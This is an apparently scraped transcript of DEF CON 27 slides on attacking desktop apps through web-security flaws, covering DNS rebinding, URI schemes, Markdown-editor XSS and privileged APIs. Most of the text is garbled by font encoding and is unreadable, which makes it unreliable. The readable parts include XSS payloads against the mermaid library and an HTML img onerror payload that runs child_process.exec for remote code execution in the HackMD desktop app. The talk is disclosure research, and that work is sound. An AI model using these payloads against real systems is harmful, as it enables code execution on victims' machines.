DEF CON 27 Hacking Conference Presentation CON 27/DEF CON 27...=GK JYVCbXCbA PullPayload bypassSOP...
82
Web2Own ATTACKING DESKTOP APPS FROM WEB SECURITY 'S PERSPECTIVE
Transcript of DEF CON 27 Hacking Conference Presentation CON 27/DEF CON 27...=GK JYVCbXCbA PullPayload bypassSOP...
Web2OwnATTACKING DESKTOP APPS FROMWEB SECURITY'S PERSPECTIVE
Who are we
• 9aX.TgU h
• LYbWYbh KYWif hm PiUbki EUV
• FYaVYf cZ )cdg <L? LYUa
• KdYU_Yf cZ RYfcG \hg+)*1 UbX ABL;+)*1=iVU
Who are we
• 9AYUfaYb*
• KYWif hm JYgYUfW\Yf b LYbWYbh KYWif hm PiUbki EUV
• KdYU_Yf cZ :g UKYWOYgh +)*1
Who are we
• 9L)a-hcT
• KYWif hm JYgYUfW\Yf b LYbWYbh KYWif hm PiUbki EUV
• FYaVYf cZ KmW cjYf KYWif hm LYUa
• KdYU_Yf cZ RYfcG \hg+)*1 UbX ABL;+)*1=iVU
;UW_ fcibX
:hhUW_ b XYg_hcd Uddg
I know about web securityI can do little reversingI know nothing about pwning
Can I pop up a like people in Pwn2Own?
LfUX h cbU Uddg jg \mVf X Uddg
VS
DYYd kYV gYWif hm fYUh
:hhUW_ gifZUWYg cjYfj Yk
• HdYbYX dcfhg
• MJB gW\YaYg
• :dd ZYUhifYg
HdYbYX Icfhg
O\m cdYb dcfhg
• OYVgYfjYf• cWU XmbUa W kYVg hY• :IB WU
• =YVi b
• Hh\Yfg
Ack hc UWWYgg hc h\YgY dcfhg8
• V bX cb )')')')
• V bX cb cWU \cgh
• VfckgYf g cif ccX Zf YbX• ALLI dfchcWc• hc YfUbWY cZ Y U WcaaUbXg
KUaY Hf b Ic Wm !KHI"
• Lkc dU Yg \UjY gUaY3• dfchcWc % \cgh% dcfh
• =YZUi h VY\Uj cfg b VfckgYfg
same origin different origin
send simple requests ✓ ✓send requests with custom headers ✓ ✘
get response ✓ ✘
=GK JYV bX b
Pull Payload bypass SOP
rebind.comx.x.x.x
rebind.com127.0.0.1
Attack
rebind.com127.0.0.1
DNS Changed
SameOrigin
=GK JYV bX b dfYfYei g hYg
• OYV gYfj WY XcYg bch W\YW_ h\Y \cghbUaY
• N Wh a kci X kU h ibh =GK \Ug W\Ub YX• ;fckgYf \Ug U =GK WUW\Y
<KJ? jg =GK JYV bX b
DNS Rebinding CSRF
Bypass SOP ✓ ✘Pass hostname check ✘ ✓effective immediately ✘ ✓
<UgY ghiXm3 : dcdi Uf h\ fX dUfhm d i b
• OY<\UhI i b FUWHK• DYYd h\Y fYWU YX aYggU Y• :ihc fYd m U aYggU Y• o
• *,))) ghUf ( +))) Zcf_g
• Khcd aU bhU bYX acbh\g U c
\hhdg3(( h\iV'Wca(LD__ HKYf(OY<\UhI i b FUWHK
:hhUW_ b k h\ =GK JYV bX b
• ; bX cb *+0')')'*3.+0))• (kYW\Uh d i b(igYf• (kYW\Uh d i b(W\Uh c• (kYW\Uh d i b(gYbX aYggU Y
• KhUm cb h\Y Yj dU Y% UhhUW_Yf WUb'''• @Yh U Zf YbXg• @Yh U W\Uh c g• KYbX Ubm aYggU Y hc Ubm igYf
https://xlab.tencent.com/cn/2018/10/23/weixin-cheater-risks/
? l8
• Kh UZZYWhYX Vm <KJ? UhhUW_• KYbX Ubm aYggU Y hc U _bckb igYf
https://github.com/TKkk-iOSer/WeChatPlugin-MacOS/commit/3bf0a352ddbd85250eb00c3f4ed21bb7810b77f4
NSString *hostname = request.headers[@"Host"];NSString *url1 = [NSString stringWithFormat:@"127.0.0.1:%d", port];NSString *url2 = [NSString stringWithFormat:@"localhost:%d", port];if(!([hostname isEqualToString:url1] | [hostname isEqualToString:url2])){
return [GCDWebServerResponse responseWithStatusCode:404];}
EYggcb YUfbYX
• : kUmg W\YW_ h\Y \cgh• DYYd =GK fYV bX b UkUm
• MgY ibdfYX WhUV Y XUhU(dUh\• IfYjYbh <KJ? UhhUW_
• :jc X ig b h\ fX dUfhm d i bg
<UgY ghiXm3 PXYVi• IAI XYVi b YlhYbg cb• Ack XcYg h kcf_8
• JYeiYgh k h\ P=>;M@TK>KKBHGTKL:JL b dUfUag• \hhd3((*+0')')'*( bXYl'd\d8P=>;M@TK>KKBHGTKL:JL
• PXYVi WcbbYWhg hc U gYfjYf• KYfjYf bhYfUWhg k h\ PXYVi ig b =;@I WcaaUbXg
• O\ W\ gYfjYf hc WcbbYWh8 ! b U ZU VUW_ cfXYf"• lXYVi 'fYachYT\cgh• P ?cfkUfXYX ?cf• JYachY :XXf
PXYVi JYachY :hhUW_• IfYfYei g hYg
• lXYVi 'fYachYTWcbbYWhTVUW_ 6 *• lXYVi 'fYachYTYbUV Y 6 *• lXYVi 'fYachYT\cgh g GcbY
• ?cf acgh cZ h\Y IAI XYjY cdYfg% mYg• :hhUW_ b• KYh id U Yj gYfjYf kU h b Zcf PXYVi hc WcbbYWh• MgY =GK fYV bX b UhhUW_ hc gYbX U P ?cfkUfXYX ?cf \YUXYf• >j gYfjYf gYbX dUm cUX hc PXYVi• @Yh U fYjYfgY g\Y
https://bugs.php.net/bug.php?id=76149
:hhUW_ gWYbUf c
ci UfY U IAI XYjY cdYf
ci igY PXYVi
BZ mci ghUm cb Ub Yj dU Y Zcf -) .) gYWcbXg
ci aUm VY \UW_YX
Hh\Yf WUgYg
• GcXYCK =YVi b dcfh• \hhd3((V iYW)fY'V c gdch'Wca(+)*1(),(WjY +)*1 0*/) dkb bbcXY g XYjY cdYfg'\ha
• CUjU JFB !Z lYX b :df +)*1"• JFB giddcfhg ALLI• CUjU XYgYf U nY UhhUW_g• \hhdg3((aVYW\ Yf' h\iV' c(+)*1().(+*(CUjU <N> +)*1 +1))(
open port
bind on0.0.0.0
bind on127.0.0.1
attackremotely
DNSRebinding
CSRF
MJB KW\YaYg
MJB KW\YaYg
• UibW\ Uddg
• gYbX aYggU Y b Udd
MJB KW\YaY cb O bXckg
• K\Y >lYWihYO!GMEE% E cdYb % E WcXY'YlY cdYb if * % GMEE% GMEE% KOTKAHO "4
• :jc X gdUWYg% eichYg% cf VUW_g Ug\Yg b mcif MJB• *
> YWhfcb <N> +)*1 *)))))/• <\fca ia dUfUaYhYf b YWh cb
• fYbXYfYf WaX dfYZ l• di UibW\Yf• ih hm WaX dfYZ l• ddUd d i b UibW\Yf• ''''
• K\Y >lYWihYO!GMEE% E cdYb % E <\fca ia'YlY bUWXV6WaX'YlY % GMEE% GMEE % KOTKAHO "4
• : ZfUaYkcf_g VUgYX cb <\fca ia aUm \UjY h\Y gUaY ggiY
bk' g ZfUaYkcf_
• : ZUacig XYg_hcd bchY Udd WUh cb• +)) F cbg cZ igYfg
• Bb YWh dUfUaYhYf hc YlYWihY WcaaUbX
JYgdcbg V Y X gW cgifY
• )+(+*(+)*2 fYdcfhYX hc >jYfbchY
• )-(*1(+)*2 Z lYX
• OBGGHL> *22-*
MJB KW\YaY g =>:=8
• ? lYX b D;--202,. Vm F WfcgcZh !).(+2(+)*2"
• MJB KW\YaY g if YbWcXYX• <Ub bch b YWh dUfUaYhYfg
https://support.microsoft.com/en-hk/help/4497935/windows-10-update-kb4497935
URIScheme
APP
framework
:dd ZYUhifYg
• <fcgg K hY KWf dh b ! PKK "
• If j Y YX :IB
• IfchcWc \UbX Yf
L\Y PKK ghcfm VY bg Zfca aUf_Xckb YX hcfg
g YlYWihYX b h\Y dfYj Yk k bXck
• b h\Y mYUf cZ +)*/
• aUf_Xckb YX hcfg• Fci ( FUWXckb ( NK<cXY '''
Ack hc Yld c h8
• dfYj Yk dU Y fYbXYfYX b Z Y XcaU b• ghYU Z Yg cb X g_• ghYU WfYXYbh U g !UWWcibh W cbY"
• J<>• df j Y YX :IBg• ;fckgYf *XUm
<UgY ghiXm3 FUW=ckb cWU Z Y fYUX
• 010. ghUfg ( 2/* Zcf_g
JYgdcbg V Y X gW cgifY
• )1(+.(+)*/ fYdcfhYX hc h\Y Uih\cf j U YaU
• )2().(+)*/ Uih\cf d UbYX hc fYacjY bYhkcf_ WUdUV h Yg
• )2()/(+)*/ bg ghYX cb U dfcdYf Z l
• Kh UZZYWhYX bck
L\ b g UfY Yhh b \UfXYf
• hh Y PKK b aUf_Xckb YX hcfg bckUXUmg
• <cbhYbh KYWif hm Ic Wm !<KI"
• KUbXVcl• gc UhYX WcbhYlh• bc bcXY acXi Yg !bcXY bhY fUh cb6ZU gY"
• AUfXYf hc Z bX% \UfXYf hc Yld c h
EYh g cc_ Uh VfUf Yg igYX Vm aUf_Xckb YX hcfg
aYfaU X
• W\Ufhg ( X U fUa
• **2, igYX ( +-+)0 ghUfg ( *-/+ Zcf_g
• UhYgh jYfg cb
https://mermaidjs.github.io/
aYfaU X lgg # ,graph TDB --> C{<iframe src=javascript:alert`1`>}
graph LR;A-->B;click B callback "<iframe src=javascript:alert`1`>"
graph LR;xss-->B;click xss alert "callback"click B "javascript:alert`1`" "link"
aYfaU X XYac g hY
DUhYl ( FUh\ Ul
• aUh\ hmdYgYhh b
• DUhYl VYZcfY j)'*)') fW !/-)1 igYX ( *)0). ghUf ( 0,1 Zcf_"
• FUh\CUl VYZcfY j, VYhU',!*+*/ igYX( /12. ghUf ( 21+ Zcf_"
• fYdcfhYX Vm ch\Yf img 3!
Z ckW\Ufh' g
• Z ck W\Ufh X U fUag
• --1 igYX ( /))) ghUfg ( 120 Zcf_g
• UhYgh jYfg cb
Kia h id
• aYfaU X ! UhYgh"
• FUh\CUl !VYZcfY j, VYhU', "
• DUhYl !VYZcfY j)'*)') fW"
• ? ck<\Ufh' g ! UhYgh"
• :ZZYWh acfY Uddg h\Ub kY Z bX
<UgY ghiXm3 AUW_F= !ig b aYfaU X"
• */)%))) UWh jY igYfg
AUW_F= <KI
script-src 'self' vimeo.com https://gist.github.com www.slideshare.net 'unsafe-eval' https://assets.hackmd.io https://www.google.com https://apis.google.com https://docs.google.com https://www.dropbox.com https://*.disqus.com https://*.disquscdn.com https://www.google-analytics.com https://stats.g.doubleclick.net https://secure.quantserve.com https://rules.quantcount.com https://pixel.quantserve.com https://js.driftt.com https://embed.small.chat https://static.small.chat https://www.googletagmanager.com https://cdn.ravenjs.com https://browser.sentry-cdn.com 'nonce-cdbbafd5-903e-443c-bb33-c25b0cc73e21' 'sha256-EtvSSxRwce5cLeFBZbvZvDrTiRoyoXbWWwvEVciM5Ag=' 'sha256-NZb7w9GYJNUrMEidK01d3/DEtYztrtnXC/dQw7agdY4=' 'sha256-L0TsyAQLAc0koby5DCbFAwFfRs9ZxesA+4xg0QDSrdI=';
https://csp-evaluator.withgoogle.com/
;mdUgg <KI ig b @cc Y LU FUbU Yf
• <KI VmdUgg ZcibX Vm 9_*hhYb
https://github.com/k1tten/writeups/blob/master/bugbounty_writeup/HackMD_XSS_%26_Bypass_CSP.md
AUW_F= PKK
AUW_F= XYg_hcd Udd
• fYbXYfYf' g b df j Y YX WcbhYlh
• kYVj Yk hU fYbXYfg dU Y b gUbXVcl• bc bcXY bhYf fUh cb
• Ack hc hifb PKK hc J<> b XYg_hcd Udd8
fYbXYfYf' g
• fYbXYf \ha Zfca gUbXVcl b U df j Y YX WcbhYlh
webview.addEventListener('dom-ready', function () {// set webview titledocument.querySelector('#navbar-container .title').innerHTML = webview.getTitle()document.querySelector('title').innerHTML = webview.getTitle()})
JYX fYWh hc Yld c h dU Y ig b PKK
• cWUh cb6\hhd3((llll(Yld c h'\ha• Lf Yf Xca fYUXm
<head><title><img src=1
onerror="process.mainModule.require('child_process').exec('open /Applications/Calculator.app')"></title>
</head>
JYgdcbg V Y X gW cgifY
• )0()1(+)*2 fYdcfhYX hc AUW_F=
• )0(**(+)*2 Z lYX
ALFE b YWh cb b Uddg
• bc CUjUKWf dh YlYWih cb
• d\ g\ b 8 UXjYfh g b 8
If j Y YX :IBg
• bcXY acXi Yg
• Wighca :IB• CK;f X Y k h\ kfUddYf• igiU m \UjY diV W XcWg
<UgY ghiXm3 U dcdi Uf W\Uh Udd
• ; cbg cZ igYfg
• >aVYXYX VfckgYf k h\ Wighca :IBg• <ighca :IBg k h\cih XcaU b fYghf Wh cb• OY XcWiaYbhYX Zcf XYjY cdYfg
• HdYb MJEg b YaVYXXYX VfckgYf• KYbX U gdYW U hmdY cZ aYggU Y !?YYX<UfX FYggU Y"• Bb Udd MJB gW\YaY
<ighca :IBg
• Udd'Xckb cUX? Y• igYf W\ccgY U cWUh cb hc gUjY h\Y Z Y
• Udd'cdYbEcWU ? Y• cdYb h\Y Z Y X fYWh m k h\cih WcbZ faUh cb !aUWHK"
OY bYYX l
• >E? WUb bch YlYWihY k h\cih l
• ;Ug\ ( Imh\cb o UfY cdYbYX Vm hYlh YX hcfg
• ' Uf kcf_g
:hhUW_ gWYbUf c
ci \UjY CUjU
ci W W_ U ?YYX<UfX aYggU Y Zfca U \UW_Yf
: X U c Ug_g mci hc gUjY U Z Y
KUj b U Z Y igiU m \Ufa Ygg% gc mci W W_YX gUjY
ci UfY \UW_YX
JYgdcbg V Y X gW cgifY
• fYdcfhYX cb )*(+,(+)*2
• Z lYX b h\Y UhYgh jYfg cb
• HdYb h\Y Zc XYf bghYUX cZ h\Y Z Y
IfchcWc \UbX Yf
• \hhd• fYbXYf dU Y b Ub ibhfighYX WcbhYlh• VfckgYf *XUm
• CUjUKWf dh• gYbX fYeiYgh b Z Y XcaU b• ghYU cWU Z Yg
• Z Y ( KF;• UibW\ dfc fUa• GLEF JY Um
be careful of<a>
<UgY ghiXm3 Xi V
• ,)22 ghUfg ( *-,- Zcf_g
• O XY m igYX Vm <\ bYgY XYg_hcd Uddg cb O bXckg
• \ha _Y hU g ! g\ck\ha 6hfiY "• 5U l7hYlh5(U7 Zcf \mdYf b_• 5 l m n7 Zcf aU Y• 5W llllll7hYlh5(W7 Zcf Wc cf
https://github.com/duilib/duilib
U W\Uh Udd
• g\ck\ha 6hfiY
• fYbXYf hU g b h\Y W\Uh fcid bUaY cf dYfgcbU ghUhig
GLEF JY Um UhhUW_ ig b 5 7 hU• 5 SSUhhUW_Yf * *7• gYbX k bXckg WfYXYbh U g UihcaUh WU m
• cbWY h\Y hU g fYbXYfYX cb h\Y j Wh a g aUW\ bY• igiU m k h\cih igYf bhYfUWh cb
• cZZ bY VfihY ZcfWY• fY Um h\Y WfYXYbh U g hc ch\Yf gYfj WYg
• fY Um hc >lW\Ub Y !ghYU YaU g"• fY Um hc Ubch\Yf aUW\ bY h\Uh \UjY h\Y gUaY dUggkcfX• o
<UgY ghiXm3 @\ XfU
• VUgYX cb C:N:
• ig b PFE hc XYgWf VY U dfc YWh
PP> g bch Ybci \
• ghYU Z Yg
• gYbX \hhd fYeiYghg
• <Ub kY hifb h hc J<>8
@\ XfU Zfca PP> hc J<>
• CUjU k gYbX WfYXYbh U g k\Yb YbWcibhYfg GLEF VUgYX-)* \hhd fYgdcbgY
• :hhUW_Yf gYh id U aU W cig \hhd gYfjYf
• JY Um h\Y WfYXYbh U g hc KF; gYfj WY
https://xlab.tencent.com/en/2019/03/18/ghidra-from-xxe-to-rce/
feature
XSS
Privileged API
Protocol Handler
http
JavaScript
file
<cbW ig cb
;Y WUfYZi k\ Y XYVi b
• IAI
• GcXYCK
• CUjU !jYfg cbg VYZcfY :df +)*1"
;Y WUfYZi k\ Y ig b h\YgY VfUf Yg
• aYfaU X ! UhYgh"
• FUh\CUl !VYZcfY j, VYhU',"
• DUhYl !VYZcfY j)'*)') fW"
• ? ck<\Ufh ! UhYgh"
• Xi V !k h\ g\ck\ha 6hfiY"
• bk' g !fY ghYf b MJB gW\YaY"
:W_bck YX YaYbhg• 9hcaV_YYdYf• 9>j F))b• 9<cXY<c cf gh• 9aVYW\ Yf !\hhdg3(( h\iV'Wca(aVYW\ Yf"• 9V iYW)fY !\hhd3((V iYW)fY'V c gdch'Wca"• 9_*hhYb !\hhdg3(( h\iV'Wca(_*hhYb"• 9g \WhcaU• 9J WhYfR !\hhdg3(( h\iV'Wca(J WhYfR"• o
L\Ub_g
![DEF CON 27 Hacking Conference Presentation CON 27/DEF CON 27 presentations/DEF… · BPF • tcpdump -i any -n 'tcp[tcpflags] & (tcp-syn|tcp-ack) != 0' (000) ldh [14] (001) jeq #0x800](https://static.fdocuments.net/doc/165x107/5e920f929be5556ea6295775/def-con-27-hacking-conference-presentation-con-27def-con-27-presentationsdef.jpg)
